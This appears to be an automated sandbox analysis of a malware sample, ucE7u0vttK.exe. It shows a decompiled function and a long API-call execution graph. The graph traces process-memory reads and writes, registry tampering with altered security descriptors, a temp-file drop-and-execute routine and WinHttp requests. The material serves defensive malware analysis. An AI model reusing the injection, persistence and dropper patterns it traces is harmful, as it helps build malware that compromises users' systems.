      • Part of subcall function 003DEC77: memcpy.MSVCRT ref: 003DECA7
      • Part of subcall function 003DEC77: memcpy.MSVCRT ref: 003DECB9
    • memcpy.MSVCRT ref: 003DEEA9
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C1B20, Relevance: 5.1, APIs: 4, Instructions: 62
    C-Code - Quality: 93%
    			E003C1B20(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				void* _t29;
				void* _t37;
				intOrPtr _t39;
				void* _t43;

				_t43 = __eflags;
				_t37 = __edx;
				_t39 = __ecx;
				E003C2750(__ecx + 0x4f4);
				E003C5000(__ecx + 0x4fc);
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				 *((intOrPtr*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				memset(__ecx + 0x30, 0, 0x2c);
				_t29 = _t39 + 0x5c;
				memset(_t29, 0, 0x498);
				 *((intOrPtr*)(_t39 + 0x24)) = E003C4A10(_t43);
				_t23 = E003CF0A0();
				_push(0x10);
				 *((intOrPtr*)(_t39 + 0x1c)) = _t23;
				L003CA47E();
				_t44 = _t23;
				if(_t23 == 0) {
					_t24 = 0;
					__eflags = 0;
				} else {
					_t24 = E003C2DF0(_t23, _t44);
				}
				 *((intOrPtr*)(_t39 + 4)) = _t24;
				_push(0x10);
				 *((intOrPtr*)(_t24 + 8)) = _t39;
				L003CA47E();
				if(_t24 == 0) {
					_t25 = 0;
					__eflags = 0;
				} else {
					_t25 = E003CCBF0(_t24, 0xc);
				}
				 *((intOrPtr*)(_t39 + 0xc)) = _t25;
				 *_t29 = 0;
				 *((intOrPtr*)(_t39 + 0x60)) = 0;
				 *((intOrPtr*)(_t39 + 0x4ec)) = 1;
				E003D14A0(_t39);
				E003CCE00(_t39, _t37);
				return _t39;
			}










    0x003c1b20
    0x003c1b20
    0x003c1b22
    0x003c1b2b
    0x003c1b36
    0x003c1b44
    0x003c1b47
    0x003c1b4a
    0x003c1b4d
    0x003c1b50
    0x003c1b53
    0x003c1b5d
    0x003c1b62
    0x003c1b6c
    0x003c1b6f
    0x003c1b74
    0x003c1b76
    0x003c1b79
    0x003c1b81
    0x003c1b83
    0x003c1b8e
    0x003c1b8e
    0x003c1b85
    0x003c1b87
    0x003c1b87
    0x003c1b90
    0x003c1b93
    0x003c1b95
    0x003c1b98
    0x003c1ba2
    0x003c1baf
    0x003c1baf
    0x003c1ba4
    0x003c1ba8
    0x003c1ba8
    0x003c1bb3
    0x003c1bb6
    0x003c1bb8
    0x003c1bbb
    0x003c1bc5
    0x003c1bcc
    0x003c1bd6

    APIs
    • memset.MSVCRT ref: 003C1B53
    • memset.MSVCRT ref: 003C1B62
      • Part of subcall function 003C4A10: GetProcAddress.KERNEL32(00000000), ref: 003C4A74
    • ??2@YAPAXI@Z.MSVCRT ref: 003C1B79
    • ??2@YAPAXI@Z.MSVCRT ref: 003C1B98
      • Part of subcall function 003D14A0: wsprintfW.USER32 ref: 003D1639
      • Part of subcall function 003D14A0: rand.MSVCRT ref: 003D1690
      • Part of subcall function 003CCE00: _time64.MSVCRT ref: 003CCE12
      • Part of subcall function 003CCE00: _time64.MSVCRT ref: 003CCE59
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd

    Analysis Process: ucE7u0vttK.exe PID: 3568 Parent PID: 3536

    Execution Graph

    Execution Coverage:18.4%
    Dynamic/Decrypted Code Coverage:100%
    Signature Coverage:5.4%
    Total number of Nodes:2000
    Total number of Limit Nodes:76

    Graph

    execution_graph 14231 3b24b9 14232 3b24cd __initterm_e 14231->14232 14233 3b2502 14232->14233 14234 3b24e7 _initterm 14232->14234 14236 3b24d3 14232->14236 14235 3b2507 InterlockedExchange 14233->14235 14237 3b250f 14233->14237 14234->14233 14235->14237 14237->14236 14238 3b25df 14237->14238 14239 3b2593 exit 14237->14239 14238->14236 14240 3b25e7 _cexit 14238->14240 14239->14237 14240->14236 14241 3b08a9 14242 3b08b0 14241->14242 14244 3b08e3 Sleep 14242->14244 14245 39a590 14242->14245 14244->14242 14247 39a5aa 14245->14247 14264 39a985 14245->14264 14248 39bb40 HeapFree 14247->14248 14250 39a92c 14247->14250 14251 399090 memset memcpy 14247->14251 14265 39a85a _time64 14247->14265 14266 3966c0 11 API calls 14247->14266 14268 3a1d90 10 API calls 14247->14268 14269 39a8ed _time64 14247->14269 14270 39a9bb _time64 14247->14270 14271 399540 14247->14271 14312 394f50 14247->14312 14319 3a19b0 14247->14319 14248->14247 14252 39bb40 HeapFree 14250->14252 14255 39a93c 14250->14255 14250->14264 14251->14247 14252->14255 14253 39a95c 14258 39a96c 14253->14258 14260 39bb40 HeapFree 14253->14260 14254 39a94c 14254->14253 14257 39bb40 HeapFree 14254->14257 14255->14254 14256 39bb40 HeapFree 14255->14256 14256->14254 14257->14253 14261 39a97c 14258->14261 14262 39bb40 HeapFree 14258->14262 14260->14258 14263 39bb40 HeapFree 14261->14263 14262->14261 14263->14264 14264->14242 14265->14247 14267 39a8ad CreateThread 14266->14267 14267->14247 14409 3944b0 14267->14409 14268->14247 14269->14247 14270->14247 14272 399777 14271->14272 14275 399561 14271->14275 14273 399787 14272->14273 14274 39bb40 HeapFree 14272->14274 14273->14247 14274->14273 14277 39973f 14275->14277 14279 3a1d90 10 API calls 14275->14279 14276 399757 14280 399767 14276->14280 14282 39bb40 HeapFree 14276->14282 14277->14276 14278 39bb40 HeapFree 14277->14278 14294 3997ab 14277->14294 14278->14276 14281 399593 14279->14281 14280->14272 14284 39bb40 HeapFree 14280->14284 14283 3a1d90 10 API calls 14281->14283 14282->14280 14285 3995a0 14283->14285 14284->14272 14286 3a1d90 10 API calls 14285->14286 14287 3995ae 14286->14287 14289 396cd0 ReadProcessMemory 14287->14289 14311 3996ef 14287->14311 14288 399721 14291 39972f 14288->14291 14292 39bb40 HeapFree 14288->14292 14296 3995e7 14289->14296 14290 39bb40 HeapFree 14290->14288 14291->14277 14293 39bb40 HeapFree 14291->14293 14292->14291 14293->14277 14294->14247 14295 39962e 14297 39966f 14295->14297 14300 396cd0 ReadProcessMemory 14295->14300 14295->14311 14296->14295 14298 396cd0 ReadProcessMemory 14296->14298 14296->14311 14302 396cd0 ReadProcessMemory 14297->14302 14305 3996ac 14297->14305 14297->14311 14299 399614 14298->14299 14303 391170 11 API calls 14299->14303 14299->14311 14301 399652 14300->14301 14306 391170 11 API calls 14301->14306 14301->14311 14304 399693 14302->14304 14303->14295 14307 391170 11 API calls 14304->14307 14304->14311 14308 3a1d90 10 API calls 14305->14308 14305->14311 14306->14297 14307->14305 14309 3996cf 14308->14309 14310 396cd0 ReadProcessMemory 14309->14310 14309->14311 14310->14311 14311->14288 14311->14290 14313 394f73 14312->14313 14314 394f63 14312->14314 14313->14247 14314->14313 14315 3a1d90 10 API calls 14314->14315 14317 394f93 14315->14317 14316 394fc1 memcpy 14316->14247 14317->14313 14317->14316 14318 394fe2 memcpy 14317->14318 14318->14313 14320 3a19e2 14319->14320 14321 3a19f2 14319->14321 14320->14321 14341 39b270 14320->14341 14321->14247 14323 3a1b06 14324 39b270 15 API calls 14323->14324 14327 3a1a40 14323->14327 14326 3a1b1c 14324->14326 14326->14327 14328 3a0500 14 API calls 14326->14328 14333 3a1a5a 14327->14333 14353 397af0 14327->14353 14328->14327 14329 3a1a72 14330 3a1a7f 14329->14330 14334 39bb40 HeapFree 14329->14334 14330->14321 14335 39bb40 HeapFree 14330->14335 14333->14329 14337 397af0 14 API calls 14333->14337 14334->14330 14335->14321 14336 3a1ab7 14336->14327 14338 397e20 11 API calls 14336->14338 14337->14329 14339 3a1ad0 14338->14339 14339->14327 14367 3a0500 14339->14367 14342 39b28b 14341->14342 14344 39b29c 14341->14344 14343 3a1d90 10 API calls 14342->14343 14342->14344 14345 39b2c1 14343->14345 14344->14323 14344->14327 14359 397e20 14344->14359 14345->14344 14346 39b2f0 memcpy 14345->14346 14347 39b304 memcpy 14345->14347 14351 39b30f 14346->14351 14347->14351 14348 39b370 14349 39bb40 HeapFree 14348->14349 14349->14344 14350 394f50 12 API calls 14350->14351 14351->14348 14351->14350 14352 39bb40 HeapFree 14351->14352 14352->14351 14354 397af9 14353->14354 14358 397b1e 14353->14358 14355 3a0780 14 API calls 14354->14355 14354->14358 14356 397b18 14355->14356 14357 39bb40 HeapFree 14356->14357 14357->14358 14358->14333 14360 397e47 14359->14360 14361 397eaa 14360->14361 14362 3a1d90 10 API calls 14360->14362 14361->14336 14363 397e57 14362->14363 14364 397e9a 14363->14364 14365 39bb40 HeapFree 14363->14365 14364->14336 14366 397e8a 14365->14366 14366->14336 14368 3a0530 14367->14368 14369 3a0526 14367->14369 14376 3a0554 14368->14376 14402 3926f0 14368->14402 14369->14323 14370 3a0576 14373 3926f0 2 API calls 14370->14373 14377 3a0737 14370->14377 14378 3a0599 14370->14378 14371 3926f0 2 API calls 14371->14370 14373->14378 14374 3926f0 2 API calls 14375 3a05bc 14374->14375 14380 3a071e 14375->14380 14382 3a0703 14375->14382 14384 3a0780 14 API calls 14375->14384 14376->14370 14376->14371 14379 3a0750 14376->14379 14377->14379 14383 391140 VirtualFreeEx 14377->14383 14378->14374 14378->14375 14378->14380 14381 3a0763 14379->14381 14386 39bb40 HeapFree 14379->14386 14380->14377 14385 391140 VirtualFreeEx 14380->14385 14381->14323 14382->14380 14388 391140 VirtualFreeEx 14382->14388 14383->14379 14387 3a0618 14384->14387 14385->14377 14386->14381 14389 3a0649 14387->14389 14391 396cd0 ReadProcessMemory 14387->14391 14388->14380 14390 391140 VirtualFreeEx 14389->14390 14390->14382 14392 3a0645 14391->14392 14392->14389 14393 396cd0 ReadProcessMemory 14392->14393 14394 3a0669 14393->14394 14394->14389 14395 396cd0 ReadProcessMemory 14394->14395 14396 3a0684 14395->14396 14396->14389 14397 3a1d90 10 API calls 14396->14397 14398 3a069f 14397->14398 14398->14389 14399 396cd0 ReadProcessMemory 14398->14399 14400 3a06bf 14399->14400 14400->14389 14401 396cd0 ReadProcessMemory 14400->14401 14401->14389 14403 39270e 14402->14403 14404 392741 14403->14404 14405 397b30 WriteProcessMemory 14403->14405 14404->14376 14406 392725 14405->14406 14406->14404 14407 391140 VirtualFreeEx 14406->14407 14408 392738 14407->14408 14408->14376 14410 3944c2 14409->14410 14411 394516 14410->14411 14412 399090 2 API calls 14410->14412 14413 3a1d90 10 API calls 14411->14413 14421 3945ee 14411->14421 14412->14411 14414 39456d 14413->14414 14415 3a1d90 10 API calls 14414->14415 14416 39457b 14415->14416 14416->14421 14488 397600 14416->14488 14418 3947ce 14419 3947dc 14418->14419 14422 39bb40 HeapFree 14418->14422 14424 3947ec 14419->14424 14427 39bb40 HeapFree 14419->14427 14421->14418 14425 3946c9 ??2@YAPAXI 14421->14425 14426 3946de ??2@YAPAXI 14421->14426 14429 3b1d30 3 API calls 14421->14429 14442 3947af Sleep 14421->14442 14444 3b1280 14421->14444 14447 3990f0 14421->14447 14422->14419 14423 3945be 14428 39bb40 HeapFree 14423->14428 14430 39bb40 HeapFree 14424->14430 14434 3947fc 14424->14434 14425->14421 14426->14421 14427->14424 14433 3945e8 14428->14433 14429->14421 14430->14434 14431 39481c 14437 39bb40 HeapFree 14431->14437 14432 39480c 14432->14431 14436 39bb40 HeapFree 14432->14436 14438 39bb40 HeapFree 14433->14438 14434->14432 14435 39bb40 HeapFree 14434->14435 14435->14432 14436->14431 14439 394825 14437->14439 14438->14421 14440 394840 14439->14440 14441 394837 ??3@YAXPAX 14439->14441 14441->14440 14442->14421 14445 399090 2 API calls 14444->14445 14446 3b1294 14445->14446 14446->14421 14448 399249 14447->14448 14457 399122 14447->14457 14449 399438 14448->14449 14450 39bb40 HeapFree 14448->14450 14451 39944b 14449->14451 14452 39bb40 HeapFree 14449->14452 14450->14449 14453 39945b 14451->14453 14455 39bb40 HeapFree 14451->14455 14452->14451 14454 39946b 14453->14454 14456 39bb40 HeapFree 14453->14456 14454->14421 14455->14453 14456->14454 14457->14448 14458 397e20 11 API calls 14457->14458 14462 399221 14457->14462 14458->14462 14459 399090 2 API calls 14460 3992c5 14459->14460 14494 391720 14460->14494 14462->14448 14462->14449 14462->14459 14463 3993fc 14463->14448 14555 398800 14463->14555 14465 39933b 14466 399394 14465->14466 14471 399090 2 API calls 14465->14471 14477 39933f 14465->14477 14468 3993f4 14466->14468 14501 392ba0 14466->14501 14467 3992e6 14467->14448 14467->14463 14467->14465 14469 399090 2 API calls 14467->14469 14472 39e7f0 HeapFree 14468->14472 14473 399327 14469->14473 14475 39936c 14471->14475 14472->14463 14535 395800 14473->14535 14478 395800 12 API calls 14475->14478 14549 39e7f0 14477->14549 14480 399383 14478->14480 14480->14466 14482 399387 14480->14482 14481 3993c9 14531 39d990 14481->14531 14484 39e7f0 HeapFree 14482->14484 14484->14448 14486 3993ea 14487 39e7f0 HeapFree 14486->14487 14487->14448 14489 39761b 14488->14489 14491 397617 14488->14491 14578 3a1fe0 14489->14578 14492 397681 memset 14491->14492 14493 397655 14491->14493 14492->14493 14493->14423 14493->14493 14495 3a1d90 10 API calls 14494->14495 14496 391730 14495->14496 14497 391739 _vsnwprintf 14496->14497 14498 39175b 14496->14498 14499 391754 14497->14499 14498->14467 14499->14498 14500 39bb40 HeapFree 14499->14500 14500->14498 14502 392bc3 14501->14502 14503 396cb0 2 API calls 14502->14503 14504 392bd3 14503->14504 14559 3986a0 14504->14559 14507 392d90 14507->14477 14507->14481 14508 399090 2 API calls 14509 392c05 14508->14509 14510 3a0c10 _vsnwprintf 14509->14510 14511 392c1e 14510->14511 14511->14507 14512 3a1d90 10 API calls 14511->14512 14513 392c4d 14512->14513 14513->14507 14514 399090 2 API calls 14513->14514 14515 392c6e 14514->14515 14516 3a0c10 _vsnwprintf 14515->14516 14517 392c88 14516->14517 14518 392da8 14517->14518 14520 3a1d90 10 API calls 14517->14520 14519 39bb40 HeapFree 14518->14519 14519->14507 14527 392ca3 14520->14527 14521 392d68 14522 396cb0 2 API calls 14521->14522 14523 392d76 14522->14523 14524 3986a0 _vsnprintf 14523->14524 14526 392d89 14524->14526 14525 396cb0 2 API calls 14525->14527 14526->14507 14529 39bb40 HeapFree 14526->14529 14527->14518 14527->14521 14527->14525 14527->14526 14528 3986a0 _vsnprintf 14527->14528 14530 392d13 memcpy 14527->14530 14528->14527 14529->14518 14530->14527 14532 39d999 14531->14532 14533 3993e6 14531->14533 14563 3b1510 14532->14563 14533->14468 14533->14486 14536 3a1d90 10 API calls 14535->14536 14537 39581d 14536->14537 14538 39582d memcpy 14537->14538 14544 3958e8 14537->14544 14539 395849 14538->14539 14547 39585b 14538->14547 14543 3a1d90 10 API calls 14539->14543 14539->14547 14540 39bb40 HeapFree 14541 3958db 14540->14541 14542 39bb40 HeapFree 14541->14542 14541->14544 14542->14544 14545 395874 14543->14545 14544->14465 14546 3a1d90 10 API calls 14545->14546 14545->14547 14546->14547 14547->14540 14548 3958aa 14547->14548 14548->14465 14550 39e82f 14549->14550 14554 39e7f9 14549->14554 14551 39e83e 14550->14551 14552 39bb40 HeapFree 14550->14552 14551->14448 14552->14551 14553 39bb40 HeapFree 14553->14554 14554->14550 14554->14553 14556 398809 14555->14556 14557 39881a 14555->14557 14558 3b13d0 10 API calls 14556->14558 14557->14448 14558->14557 14560 3986ac 14559->14560 14561 3986bd _vsnprintf 14560->14561 14562 392be9 14560->14562 14561->14562 14562->14507 14562->14508 14564 3b1530 14563->14564 14565 3b162c 14564->14565 14566 3b1549 WinHttpSetTimeouts 14564->14566 14567 3b153f WinHttpCloseHandle 14564->14567 14568 3b163a 14565->14568 14569 3b1633 WinHttpCloseHandle 14565->14569 14570 399090 2 API calls 14566->14570 14567->14566 14568->14533 14569->14568 14571 3b1575 WinHttpOpenRequest 14570->14571 14571->14565 14572 3b15a9 14571->14572 14573 3b15c8 WinHttpSendRequest 14572->14573 14574 3b15ae WinHttpSetOption 14572->14574 14573->14565 14575 3b15eb WinHttpReceiveResponse 14573->14575 14574->14565 14574->14573 14575->14565 14576 3b15fa WinHttpQueryHeaders 14575->14576 14576->14565 14577 3b1617 14576->14577 14577->14533 14581 3a2000 14578->14581 14579 3a22cf 14579->14491 14580 3a2100 memset 14580->14581 14581->14579 14581->14580 14581->14581 14582 3a2211 memset 14581->14582 14582->14581 14583 39952c SetUnhandledExceptionFilter 14118 39fc18 14119 39fc20 Sleep 14118->14119 14121 39fc47 SetCurrentDirectoryW 14119->14121 14123 39fcc3 srand 14121->14123 14140 39eb30 14123->14140 14125 39fcd2 14179 39baf0 CoInitializeEx 14125->14179 14127 39fcd7 14133 39fcf0 14127->14133 14182 393500 14127->14182 14131 3a04e6 14134 3a04f5 ExitProcess 14131->14134 14132 398030 10 API calls 14135 3a042e 14132->14135 14133->14131 14133->14132 14136 3a1d90 10 API calls 14135->14136 14137 3a0439 14136->14137 14139 39bb40 HeapFree 14137->14139 14139->14131 14141 39eb5c 14140->14141 14142 399090 2 API calls 14141->14142 14146 39ed4e 14141->14146 14143 39eb72 LoadLibraryW 14142->14143 14144 39eb91 14143->14144 14143->14146 14145 399090 2 API calls 14144->14145 14147 39eb9f LoadLibraryW 14145->14147 14146->14125 14147->14146 14148 39ebb8 14147->14148 14149 396cb0 2 API calls 14148->14149 14150 39ebc3 GetProcAddress 14149->14150 14150->14146 14151 39ebe6 14150->14151 14152 396cb0 2 API calls 14151->14152 14153 39ebf1 GetProcAddress 14152->14153 14153->14146 14154 39ec0e 14153->14154 14155 396cb0 2 API calls 14154->14155 14156 39ec19 GetProcAddress 14155->14156 14156->14146 14157 39ec36 14156->14157 14158 396cb0 2 API calls 14157->14158 14159 39ec41 GetProcAddress 14158->14159 14159->14146 14160 39ec5e 14159->14160 14161 396cb0 2 API calls 14160->14161 14162 39ec69 GetProcAddress 14161->14162 14162->14146 14163 39ec86 14162->14163 14164 396cb0 2 API calls 14163->14164 14165 39ec91 GetProcAddress 14164->14165 14165->14146 14166 39ecae 14165->14166 14167 396cb0 2 API calls 14166->14167 14168 39ecb9 GetProcAddress 14167->14168 14168->14146 14169 39ecd2 14168->14169 14170 396cb0 2 API calls 14169->14170 14171 39ecdd GetProcAddress 14170->14171 14171->14146 14172 39ecf6 14171->14172 14173 396cb0 2 API calls 14172->14173 14174 39ed01 GetProcAddress 14173->14174 14174->14146 14175 39ed1a 14174->14175 14176 396cb0 2 API calls 14175->14176 14177 39ed25 GetProcAddress 14176->14177 14177->14146 14178 39ed3e 14177->14178 14178->14125 14180 39bafe 14179->14180 14181 39bb01 CoInitializeSecurity 14179->14181 14180->14127 14181->14127 14183 399090 2 API calls 14182->14183 14184 393525 14183->14184 14212 39f0b0 memset GetWindowsDirectoryW 14184->14212 14187 393596 14188 3935ac ExitProcess 14187->14188 14189 3935b4 14187->14189 14190 3b0bb0 14189->14190 14191 399090 2 API calls 14190->14191 14192 3b0bd3 14191->14192 14193 3b0c0e 14192->14193 14194 399090 2 API calls 14192->14194 14195 399090 2 API calls 14193->14195 14197 3b0d25 14193->14197 14194->14193 14196 3b0c5b 14195->14196 14196->14197 14198 3b0c7d ??2@YAPAXI 14196->14198 14197->14133 14199 3b0cac 14198->14199 14201 3b0c90 14198->14201 14200 3969f0 36 API calls 14199->14200 14204 3b0d0e 14199->14204 14202 3b0cba 14200->14202 14201->14199 14203 391f00 12 API calls 14201->14203 14202->14204 14205 399090 2 API calls 14202->14205 14203->14199 14204->14197 14206 391700 HeapFree 14204->14206 14208 3b0cd6 14205->14208 14207 3b0d1c ??3@YAXPAX 14206->14207 14207->14197 14208->14204 14222 3b0900 14208->14222 14210 3b0d05 14211 39bb40 HeapFree 14210->14211 14211->14204 14213 39f0f8 GetVolumeInformationW 14212->14213 14214 39f0ec 14212->14214 14215 39f12c 14213->14215 14214->14213 14216 399090 2 API calls 14215->14216 14217 39f166 14216->14217 14218 399090 2 API calls 14217->14218 14219 39f177 14218->14219 14220 3a0c10 _vsnwprintf 14219->14220 14221 393572 CreateMutexW 14220->14221 14221->14187 14223 3a1d90 10 API calls 14222->14223 14224 3b0919 14223->14224 14225 399090 2 API calls 14224->14225 14226 3b096c 14225->14226 14227 391a80 2 API calls 14226->14227 14228 3b097d 14227->14228 14229 39bb40 HeapFree 14228->14229 14230 3b0989 14229->14230 14230->14210 16788 39fd15 16805 39e7d0 16788->16805 16790 39fd25 16791 39fd2d ??2@YAPAXI 16790->16791 16792 39fd40 16791->16792 16808 39e850 16792->16808 16794 39fd47 16812 393d50 16794->16812 16796 3a04e6 16799 3a04f5 ExitProcess 16796->16799 16797 39fd54 16797->16796 16798 398030 10 API calls 16797->16798 16800 3a042e 16798->16800 16801 3a1d90 10 API calls 16800->16801 16802 3a0439 16801->16802 16804 39bb40 HeapFree 16802->16804 16804->16796 16855 3b0790 memset 16805->16855 16809 39e868 16808->16809 16810 39e88c CoCreateInstance 16809->16810 16811 39e86c 16809->16811 16810->16794 16811->16794 16813 393d56 16812->16813 16815 3962c2 16813->16815 16816 398030 10 API calls 16813->16816 16814 3965d9 16814->16797 16815->16814 16817 39bb40 HeapFree 16815->16817 16818 39629e 16816->16818 16817->16814 16912 3932c0 16818->16912 16821 3962c7 16923 395bd0 16821->16923 16822 3962b7 16979 3b0580 16822->16979 16825 3962d2 16825->16815 16826 399090 2 API calls 16825->16826 16827 3962eb 16826->16827 16828 399090 2 API calls 16827->16828 16829 3962f9 VariantInit VariantInit 16828->16829 16966 3b0290 SysAllocString 16829->16966 16831 39634a 16968 3913c0 ??2@YAPAXI 16831->16968 16833 39636d 16856 399090 2 API calls 16855->16856 16857 3b07be 16856->16857 16870 3b0640 16857->16870 16860 399090 2 API calls 16861 3b07e7 StrStrW 16860->16861 16880 39f630 16861->16880 16863 3b0806 16864 3b0640 9 API calls 16863->16864 16865 3b080d memset 16864->16865 16866 399090 2 API calls 16865->16866 16867 3b0829 16866->16867 16868 3b0640 9 API calls 16867->16868 16869 39e7e0 16868->16869 16869->16790 16871 3b065c StrChrW RegOpenKeyExW 16870->16871 16872 3b0657 16870->16872 16873 3b0692 GetSecurityInfo 16871->16873 16879 3b073a memset 16871->16879 16872->16871 16874 3b06b9 16873->16874 16873->16879 16895 3980a0 16874->16895 16876 3b06c4 StrChrW RegOpenKeyExW 16877 3b0718 SetNamedSecurityInfoW 16876->16877 16878 3b06f7 RegSetValueExW 16876->16878 16877->16879 16878->16877 16879->16860 16881 39f63a 16880->16881 16882 39f63e 16880->16882 16881->16863 16883 3a1d90 10 API calls 16882->16883 16884 39f65a memset memcpy 16883->16884 16889 39f68a 16884->16889 16885 39bb40 HeapFree 16887 39f707 16885->16887 16887->16863 16890 39f6e2 16889->16890 16894 39f6fc 16889->16894 16901 39cea0 16889->16901 16909 3997e0 16889->16909 16891 39cea0 4 API calls 16890->16891 16892 39f6ec 16891->16892 16893 3997e0 4 API calls 16892->16893 16892->16894 16893->16894 16894->16885 16896 3980e9 16895->16896 16897 398121 memset 16896->16897 16899 3981b1 16896->16899 16898 39817e 16897->16898 16898->16899 16900 398188 SetSecurityInfo 16898->16900 16899->16876 16900->16899 16902 39ceab 16901->16902 16903 39ceb0 16901->16903 16902->16889 16904 39cebc lstrlenW 16903->16904 16905 39cf41 16903->16905 16904->16905 16906 39cec7 RegOpenKeyExW RegOpenKeyExW 16904->16906 16905->16889 16907 39cf03 RegOpenKeyExW 16906->16907 16908 39cf22 16906->16908 16907->16908 16908->16889 16910 39cea0 4 API calls 16909->16910 16911 3997fa 16910->16911 16911->16889 16916 3932e5 16912->16916 16913 39334c VariantClear 16913->16916 16914 393378 SysFreeString 16914->16916 16915 3932e9 16915->16821 16915->16822 16916->16913 16916->16914 16916->16915 16918 393412 16916->16918 16919 3933f2 SysFreeString 16916->16919 16921 399090 2 API calls 16916->16921 16917 39348f VariantClear 16917->16918 16918->16915 16918->16917 16920 3934b7 SysFreeString 16918->16920 16919->16916 16922 3932c0 2 API calls 16920->16922 16921->16916 16922->16918 16924 395c07 16923->16924 16925 395c42 LookupAccountSidW 16924->16925 16965 395eed 16924->16965 16927 395c61 16925->16927 16928 395cd5 16925->16928 16926 39bb40 HeapFree 16930 395eff 16926->16930 16927->16825 16929 395d37 16928->16929 16931 3a1d90 10 API calls 16928->16931 16933 391c70 10 API calls 16929->16933 16930->16825 16932 395cf0 memcpy memcpy 16931->16932 16932->16929 16934 395d47 16933->16934 16935 3a1d90 10 API calls 16934->16935 16936 395d58 16935->16936 16937 399090 2 API calls 16936->16937 16938 395d65 16937->16938 16939 399090 2 API calls 16938->16939 16940 395d73 16939->16940 16941 395dac 16940->16941 16942 399090 2 API calls 16940->16942 16943 399090 2 API calls 16941->16943 16945 395d83 16942->16945 16965->16926 16965->16930 16967 3b02b0 16966->16967 16967->16831 16969 3913f6 16968->16969 16970 3913d7 SysAllocString 16968->16970 16969->16833 16970->16969 16980 3b05a7 16979->16980 16989 3b0320 RegOpenKeyW 16980->16989 16982 3b0634 16982->16815 16983 3b05c1 16983->16982 16992 3b04a0 memset GetTempPathA 16983->16992 16985 3b05f1 GetModuleFileNameW 16998 3b0380 RegCreateKeyExW RegSetValueExW RegCloseKey 16985->16998 16987 3b0624 16988 3b04a0 11 API calls 16987->16988 16988->16982 16990 3b0341 RegQueryValueExW RegCloseKey 16989->16990 16991 3b0369 16989->16991 16990->16991 16991->16983 16993 3b04f0 16992->16993 16999 3b03d0 CreateFileA WriteFile CloseHandle 16993->16999 16995 3b0531 17000 3b0420 memset CreateProcessA 16995->17000 16998->16987 16999->16995 17001 3b0499 DeleteFileA 17000->17001 17002 3b0474 WaitForSingleObject CloseHandle CloseHandle 17000->17002 17001->16985 17002->17001 14584 3b2403 GetEnvironmentStringsW 14585 395700 14586 399090 2 API calls 14585->14586 14587 395721 14586->14587 14602 392450 14587->14602 14589 395731 14590 3957c5 14589->14590 14591 395750 ??2@YAPAXI 14589->14591 14597 3957f3 14589->14597 14598 397a20 19 API calls 14589->14598 14618 39b110 14589->14618 14621 393630 14589->14621 14630 39c960 14589->14630 14641 39d6e0 14589->14641 14592 3957e9 14590->14592 14593 39bb40 HeapFree 14590->14593 14590->14597 14591->14589 14594 39bb40 HeapFree 14592->14594 14593->14590 14594->14597 14600 3957ae ??3@YAXPAX 14598->14600 14600->14589 14606 39247f 14602->14606 14603 3924b2 14604 39bb40 HeapFree 14603->14604 14605 39261f 14604->14605 14605->14589 14606->14603 14607 3924e4 FindFirstFileW 14606->14607 14607->14603 14617 392509 14607->14617 14608 3925c0 FindNextFileW 14609 3925dd GetLastError 14608->14609 14608->14617 14611 3925e8 14609->14611 14610 3a1d90 10 API calls 14610->14617 14611->14603 14612 392632 14611->14612 14614 39bb40 HeapFree 14611->14614 14612->14589 14613 399090 2 API calls 14613->14617 14614->14611 14615 3a0c10 _vsnwprintf 14615->14617 14616 39bb40 HeapFree 14616->14617 14617->14608 14617->14610 14617->14611 14617->14613 14617->14615 14617->14616 14619 39e520 CoCreateInstance 14618->14619 14620 39b118 14619->14620 14620->14589 14622 391050 17 API calls 14621->14622 14624 393651 14622->14624 14623 3936ab 14623->14589 14624->14623 14645 3a1870 14624->14645 14627 39366e SysAllocStringLen 14627->14589 14628 393667 SysFreeString 14628->14627 14631 397e20 11 API calls 14630->14631 14632 39c986 14631->14632 14640 39c9d6 14632->14640 14653 397070 14632->14653 14634 39c9ec 14634->14589 14635 39bb40 HeapFree 14635->14634 14636 39c9a1 14636->14640 14660 39a270 memset 14636->14660 14640->14634 14640->14635 14642 39d702 14641->14642 14643 3a1d90 10 API calls 14642->14643 14644 39d716 14643->14644 14644->14589 14648 39f1b0 14645->14648 14651 39f1c7 14648->14651 14649 396cb0 2 API calls 14649->14651 14650 39365c 14650->14623 14650->14627 14650->14628 14651->14649 14651->14650 14652 39d750 13 API calls 14651->14652 14652->14651 14654 397079 14653->14654 14655 397090 14653->14655 14656 399090 2 API calls 14654->14656 14723 3927b0 14655->14723 14658 397087 14656->14658 14658->14636 14659 39709d 14659->14636 14661 39a2b6 14660->14661 14663 39a2f7 14660->14663 14897 3926a0 14661->14897 14665 39a3fa 14663->14665 14687 39a3a4 14663->14687 14903 39f2d0 14663->14903 14670 39a41e 14665->14670 14673 39bb40 HeapFree 14665->14673 14668 398030 10 API calls 14668->14665 14675 39a42e 14670->14675 14677 39bb40 HeapFree 14670->14677 14672 397e20 11 API calls 14672->14687 14673->14670 14674 397e20 11 API calls 14676 39a2de 14674->14676 14678 39bb40 HeapFree 14675->14678 14681 39a43e 14675->14681 14676->14665 14680 397e20 11 API calls 14676->14680 14677->14675 14678->14681 14679 39bb40 HeapFree 14682 39a44e 14679->14682 14680->14663 14681->14679 14681->14682 14683 39bb40 HeapFree 14682->14683 